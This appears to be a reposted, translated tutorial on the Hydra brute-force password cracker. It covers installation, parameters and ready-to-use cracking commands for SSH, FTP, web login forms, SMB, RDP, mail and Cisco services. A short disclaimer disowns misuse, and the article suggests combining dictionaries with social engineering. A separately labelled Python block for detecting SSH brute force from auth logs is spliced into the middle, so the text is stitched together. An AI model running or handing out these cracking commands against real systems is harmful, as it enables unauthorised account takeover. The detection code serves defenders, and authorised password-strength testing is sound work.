Detailed explanation of Hydra, the latest online cracking tool for brute-force password cracking in CentOS

Source: Internet
Author: User

PS: This brute-force password cracking tool is quite powerful and supports online password cracking for almost all protocols. The key to cracking a password is whether the dictionary is powerful enough. Social engineering can sometimes get twice the result with half the effort. This article only explores testing from a security point of view; if anyone uses its content to do damage, it has nothing to do with me.

I. Introduction

Hydra is an open-source brute-force password cracking tool from THC, a famous hacker organization. It can crack multiple types of passwords online. Official website: http://www.thc.org/thc-hydra. It supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

II. Installation

On Debian and Ubuntu releases, hydra is included in the package sources and can be installed directly online with apt-get:
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra

On Redhat/Fedora releases, download the source code package, then compile and install it. First install the relevant dependency packages:
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel

Hydra: http://www.thc.org/releases/hydra-7.3.tar.gz

# tar zxvf hydra-7.0-src.tar.gz
# cd hydra-7.0-src
# ./configure
# make
# make install

Hydra also has a GUI, but I am used to the command line.

III. Parameter description

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R: continue cracking from the previous progress.
-S: use an SSL connection.
-s PORT: specify a non-default port.
-l LOGIN: specify the target user to crack.
-L FILE: specify the username dictionary.
-p PASS: lowercase; specify a single password to try. A password dictionary is generally used instead.
-P FILE: uppercase; specify the password dictionary.
-e ns: optional checks; n: try an empty password; s: try the login name as the password.
-C FILE: use a colon-separated file, for example "login:password", in place of the -L/-P parameters.
-M FILE: specify the target list file, one target per line.
-o FILE: specify the output file.
-f: when used with the -M parameter, stop cracking once the first login/password pair is found.
-t TASKS: number of threads running simultaneously. The default value is 16.
-w TIME: set the maximum timeout, in seconds. The default value is 30 s.
-v / -V: show the detailed process.
server: the target IP address.
service: the service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp and so on.
OPT: optional.

IV. Usage examples

Simple Demonstration:

If the attack succeeds, the result is displayed. The red line is the cracked password, which can be written to a file with the -o parameter. If the dictionary is powerful enough and combined with social engineering, it will take a long time for the password to come out.

1. Crack ssh:

hydra -l username -P password_dictionary -t threads -vV -e ns ip ssh
hydra -l username -P password_dictionary -t threads -o save.log -vV ip ssh
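
Seen from the server being tested, the ssh runs above show up in the sshd auth log as a burst of "Failed password" lines from one source address. The following is an added example, not part of the original article: it counts failures per source in a sliding window and marks a later successful login from a flagged source. The log lines are constructed, and the threshold, window and year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines (documentation IP ranges, hypothetical host "web01").
SAMPLE_LOG = """\
Mar 10 02:14:01 web01 sshd[4101]: Failed password for root from 203.0.113.7 port 50112 ssh2
Mar 10 02:14:01 web01 sshd[4102]: Failed password for root from 203.0.113.7 port 50114 ssh2
Mar 10 02:14:02 web01 sshd[4103]: Failed password for invalid user admin from 203.0.113.7 port 50116 ssh2
Mar 10 02:14:03 web01 sshd[4104]: Failed password for root from 203.0.113.7 port 50118 ssh2
Mar 10 02:14:05 web01 sshd[4105]: Failed password for root from 203.0.113.7 port 50120 ssh2
Mar 10 02:14:09 web01 sshd[4106]: Accepted password for root from 203.0.113.7 port 50122 ssh2
Mar 10 09:30:12 web01 sshd[5200]: Failed password for alice from 198.51.100.23 port 40022 ssh2
Mar 10 09:31:40 web01 sshd[5201]: Accepted password for alice from 198.51.100.23 port 40030 ssh2
"""

EVENT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<outcome>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window_s=60, year=2024):
    """Flag sources with >= threshold failures in window_s seconds (values are assumptions)."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    users = defaultdict(set)      # ip -> every account name tried from that source
    alerts = {}
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is supplied to get a full datetime.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        if m["outcome"] == "Accepted":
            # A success from an already-flagged source is the highest-priority signal.
            if ip in alerts:
                alerts[ip]["success_after_burst"] = m["user"]
            continue
        users[ip].add(m["user"])
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(ip, {"peak": 0, "success_after_burst": None})
            a["peak"] = max(a["peak"], len(q))
    for ip, a in alerts.items():
        a["users"] = sorted(users[ip])
    return alerts
```

On the constructed sample only 203.0.113.7 is flagged; the single mistyped password from 198.51.100.23 stays below the threshold.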

2. Crack ftp:

hydra ip ftp -l username -P password_dictionary -t threads -vV    (threads: 16 by default)
hydra ip ftp -l username -P password_dictionary -e ns -vV

3. Crack a web login submitted in GET mode:

hydra -l username -P password_dictionary -t threads -vV -e ns ip http-get /admin/
hydra -l username -P password_dictionary -t threads -vV -e ns -f ip http-get /admin/index.php

4. Crack a web login submitted in POST mode:

hydra -l username -P password_dictionary -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"


hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

(Parameter description: -t sets the number of simultaneous threads to 3, -l sets the user name to admin, -P uses pass.txt as the dictionary, -o saves the result to out.txt, and -f stops as soon as a password is cracked. 10.36.16.18 is the target IP address, http-post-form indicates that the password is cracked through a form submitted with the HTTP POST method, and the <title> content is the message returned for a wrong guess.)

5. Crack https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6. Crack teamspeak:

hydra -l username -P password_dictionary -s port -vV ip teamspeak

7. Crack cisco:

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8. Crack smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9. Crack pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10. Crack rdp:

hydra ip rdp -l administrator -P pass.txt -V

11. Crack http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12. Crack imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

Permanent Link: http://www.ha97.com/5186.html
